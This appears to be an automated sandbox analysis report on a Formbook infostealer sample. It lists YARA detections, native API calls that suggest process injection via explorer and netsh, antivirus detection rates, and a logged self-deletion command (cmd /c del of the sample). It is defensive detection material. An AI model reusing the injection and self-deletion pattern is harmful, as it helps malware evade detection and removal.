          Source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: triage_dropped_file.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 5.2.triage_dropped_file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.triage_dropped_file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.triage_dropped_file.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.triage_dropped_file.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.triage_dropped_file.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.triage_dropped_file.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.triage_dropped_file.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.triage_dropped_file.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.triage_dropped_file.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.triage_dropped_file.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.triage_dropped_file.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.triage_dropped_file.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.triage_dropped_file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.triage_dropped_file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 0_2_0186C1D4
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 0_2_0186E608
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 0_2_0186E618
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041E876
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_00401030
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041E47F
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_00402D90
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041DDBE
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_00409E5B
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_00409E60
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041E622
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_00402FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03302B28
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325AB40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326EBB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F03DA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FDBD2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032EFA2B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_033022AE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03254120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0323F900
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032599BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0330E824
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325A830
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1002
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032620A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_033020A8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324B090
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_033028EC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03301FF1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0330DFCE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03256E30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FD616
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03302EF7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03230D20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03302D07
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03301D55
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03262581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324D5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_033025DD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324841F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FD466
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099E876
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099E47F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_00982D90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099DDB9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099E622
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_00989E5B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_00989E60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_00982FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 0323B150 appears 72 times
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041A370 NtCreateFile,
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041A420 NtReadFile,
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041A4A0 NtClose,
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041A550 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0041A41A NtReadFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0327A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0327B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0327A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0327A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0327AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03279560 NtWriteFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099A370 NtCreateFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099A4A0 NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099A420 NtReadFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0099A41A NtReadFile,
          Source: triage_dropped_file.exe, 00000000.00000002.283726954.0000000000F06000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUCOMITypeL.exe2 vs triage_dropped_file.exe
          Source: triage_dropped_file.exe, 00000000.00000002.288703731.00000000076B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs triage_dropped_file.exe
          Source: triage_dropped_file.exe, 00000000.00000002.284884958.00000000031F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs triage_dropped_file.exe
          Source: triage_dropped_file.exe, 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs triage_dropped_file.exe
          Source: triage_dropped_file.exe, 00000000.00000002.285346164.00000000032A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs triage_dropped_file.exe
          Source: triage_dropped_file.exe, 00000005.00000002.363758090.000000000179F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs triage_dropped_file.exe
          Source: triage_dropped_file.exe, 00000005.00000000.281572749.0000000000A06000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUCOMITypeL.exe2 vs triage_dropped_file.exe
          Source: triage_dropped_file.exe, 00000005.00000002.364364787.000000000347C000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs triage_dropped_file.exe
          Source: triage_dropped_file.exe, 00000005.00000002.363443966.000000000160F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs triage_dropped_file.exe
          Source: triage_dropped_file.exeBinary or memory string: OriginalFilenameUCOMITypeL.exe2 vs triage_dropped_file.exe
          Source: triage_dropped_file.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: triage_dropped_file.exeVirustotal: Detection: 52%
          Source: triage_dropped_file.exeMetadefender: Detection: 21%
          Source: triage_dropped_file.exeReversingLabs: Detection: 70%
          Source: C:\Users\user\Desktop\triage_dropped_file.exeFile read: C:\Users\user\Desktop\triage_dropped_file.exe:Zone.IdentifierJump to behavior
          Source: triage_dropped_file.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\triage_dropped_file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\triage_dropped_file.exe "C:\Users\user\Desktop\triage_dropped_file.exe"
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess created: C:\Users\user\Desktop\triage_dropped_file.exe C:\Users\user\Desktop\triage_dropped_file.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\triage_dropped_file.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess created: C:\Users\user\Desktop\triage_dropped_file.exe C:\Users\user\Desktop\triage_dropped_file.exe
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\triage_dropped_file.exe"
          Source: C:\Users\user\Desktop\triage_dropped_file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\triage_dropped_file.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@3/2
          Source: C:\Users\user\Desktop\triage_dropped_file.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6852:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\triage_dropped_file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: triage_dropped_file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
